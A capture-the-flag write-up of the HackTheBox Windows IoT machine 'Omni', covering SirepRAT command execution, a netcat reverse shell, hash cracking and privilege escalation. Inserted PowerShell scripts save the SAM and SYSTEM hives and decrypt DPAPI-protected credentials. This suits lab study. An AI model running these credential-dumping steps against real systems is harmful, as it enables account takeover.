HackTheBox Writeup — Omni
Hello guys, I am Faisal Husaini. My username on HTB is "fa1sal". Also join me on Discord. This is the first Windows IoT based machine by HackTheBox.
The IP of this box is 10.10.10.204
Port Scan
Running an NMAP full port scan on it, we get
We get a lot of open ports; the interesting one is port 8080.
Opening it in the web browser, we get a basic authentication prompt.
Trying default credentials did not work. We also see that the page identifies itself as "Windows Device Portal".
Since this is a Windows IoT machine, I searched Google for ways of exploiting Windows Device Portal on Windows IoT and came across a blog post describing the SirepRAT tool. SirepRAT talks to the Sirep test service that Windows IoT Core exposes on the network, which runs commands on the device without any authentication, so we can use it here even though the Device Portal itself is password protected.
Here we read the contents of the hosts file on the machine through SirepRAT, which confirms that we have command execution.
To know more about this tool, check the github repo down in the end of this writeup in the References section
In the above, we created a Temp directory on the remote machine.
Now we upload netcat for Windows, run a netcat reverse shell with it, and check back on the netcat listener on our machine.
We got a shell. Since this is a Windows IoT machine, the file system layout is different: the user flag is not in the default location, so I searched for it using
We got the location of the user flag. Checking its contents, we see that it is not plaintext but a PowerShell SecureString (the output of ConvertFrom-SecureString).
Checking for more contents in the directory, we see that there is an iot-admin.xml file
Checking its contents, we can see that it is also a PowerShell SecureString, in this case a PSCredential exported with Export-Clixml.
When trying to decrypt it, we get an error like the one below. The reason is that ConvertFrom-SecureString without an explicit key protects the string with DPAPI, which ties it to the user account that created it. The files are owned by another user, i.e. user app, and if you check the documentation of the SirepRAT tool, it tells us we get a shell either as NT SYSTEM or DefaultAccount, so neither of those accounts can decrypt them.
Since we have SYSTEM privileges here, we can save the SAM and SYSTEM registry hives and dump the password hashes of the local users from them.
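The enumeration and hive dump from the two steps above (finding the flag files and saving SAM/SYSTEM), as an added example; this is not code from the original writeup or from SirepRAT. It is meant to be run inside the reverse shell obtained through SirepRAT, and the output directory C:\Temp is an assumption taken from the Temp directory created earlier.

```powershell
# Added example, not part of the original writeup. Run in the SYSTEM shell
# obtained via SirepRAT. C:\Temp is the assumed output directory.
$ErrorActionPreference = 'SilentlyContinue'
$drive = $env:SystemDrive

# 1. Confirm the context: saving the hives below needs SYSTEM (or admin),
#    and the owner of the flag files tells us who can decrypt them later.
"[*] running as $(whoami)"

# 2. On IoT Core the flags are not under C:\Users\<name>\Desktop,
#    so search the whole system drive for them and show who owns each file.
$flags = Get-ChildItem -Path "$drive\" -Recurse -Force -File -Include 'user.txt','root.txt'
$flags | Select-Object FullName, Length,
    @{ Name = 'Owner'; Expression = { (Get-Acl -Path $_.FullName).Owner } }

# 3. Look next to each flag for exported credential files (iot-admin.xml on this box).
$flags | ForEach-Object {
    Get-ChildItem -Path $_.DirectoryName -File -Filter '*.xml'
} | Select-Object FullName, Length

# 4. Save the hives that hold the local account hashes. reg.exe needs
#    SYSTEM/admin for HKLM\SAM, which is why this is done from this shell.
$out = "$drive\Temp"
New-Item -ItemType Directory -Path $out -Force | Out-Null
reg.exe save HKLM\SAM    "$out\sam.save"    /y
reg.exe save HKLM\SYSTEM "$out\system.save" /y

# 5. Verify the files exist before pulling them back (for example with
#    SirepRAT's GetFileFromDevice) and feeding them to secretsdump.
Get-ChildItem -Path "$out\sam.save", "$out\system.save" | Select-Object Name, Length
```

If step 4 produces no files, the shell is not running with the privileges you assumed; check the output of whoami first. The Owner column from step 2 is the reason the SecureString decryption fails from this shell: only the owning account's DPAPI keys can unprotect those files.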
We transferred the files to our local machine and used impacket's secretsdump to dump the hashes from them (offline, from the saved hives).
Now we use john to crack the hashes we have.
We cracked only one hash with our wordlist, the one for user app. Now we use these credentials on the web interface where we were prompted for basic authentication.
We got in. Looking at the menu on the left and clicking on the Processes option, there is an option to run a command.
Since we already uploaded netcat for Windows before, we use it again to get a reverse shell, this time as the account the Device Portal runs the command under, and check back on our netcat listener.
Now we have a shell as user app, the account that created the SecureString, and we can decrypt our user flag.
Now we move on to the root flag.
Privilege Escalation
As we remember, there was an iot-admin.xml file which was also encrypted. Now we decrypt that; it works this time because we are running as app, the account that exported it.
We have the username administrator and the password, recovered from the DPAPI-protected SecureString in the XML.
We got the password for administrator, and now we repeat the process we followed after getting the password for user app: log in to the Device Portal with the new credentials, run netcat from the Processes page to get a reverse shell as administrator, and then decrypt the root flag, which is protected the same way and only opens under the administrator account.
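The decryption steps referenced above (the failed attempt from the SYSTEM shell, the user flag as app, and iot-admin.xml and the root flag later), as an added example; this is not code from the original writeup. It is meant to be run in the shell of the account that created the files, and the file paths are assumptions for this box.

```powershell
# Added example, not part of the original writeup. Paths are assumptions.
# Run as the account that produced each file (app for user.txt and
# iot-admin.xml, administrator for root.txt); any other account gets the
# "cannot decrypt" branch because the DPAPI blob is bound to the creator.

function Unprotect-SecureStringFile {
    param([Parameter(Mandatory)][string]$Path)
    # ConvertFrom-SecureString without -Key uses DPAPI under the calling
    # user's profile, so ConvertTo-SecureString only succeeds as that user.
    try {
        $secure = (Get-Content -Path $Path -Raw).Trim() | ConvertTo-SecureString -ErrorAction Stop
    } catch {
        return "[-] $Path : cannot decrypt as $env:USERNAME ($($_.Exception.Message))"
    }
    # Marshal the SecureString to a BSTR, copy it out, then zero and free it.
    $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
    try     { return [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }
}

function Unprotect-ClixmlCredential {
    param([Parameter(Mandatory)][string]$Path)
    # Export-Clixml stores a PSCredential's password as the same kind of
    # DPAPI-protected SecureString, so the same ownership rule applies.
    try {
        $cred  = Import-Clixml -Path $Path -ErrorAction Stop
        $plain = $cred.GetNetworkCredential()
        return [pscustomobject]@{ User = $plain.UserName; Password = $plain.Password }
    } catch {
        return "[-] $Path : cannot decrypt as $env:USERNAME ($($_.Exception.Message))"
    }
}

"[*] running as $env:USERNAME"
# As app (assumed locations of the files found earlier):
Unprotect-SecureStringFile -Path 'C:\Data\Users\app\user.txt'
Unprotect-ClixmlCredential -Path 'C:\Data\Users\app\iot-admin.xml'
# As administrator, after the second Device Portal login (assumed location):
Unprotect-SecureStringFile -Path 'C:\Data\Users\administrator\root.txt'
```

Run it once from each shell: from the SYSTEM shell all three calls return the "cannot decrypt" line, from the app shell the first two succeed and the root flag still fails, and only the administrator shell opens root.txt. That is exactly the behaviour that forced the detour through the SAM hashes and the Device Portal instead of reading the flags directly as SYSTEM.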
We got our root flag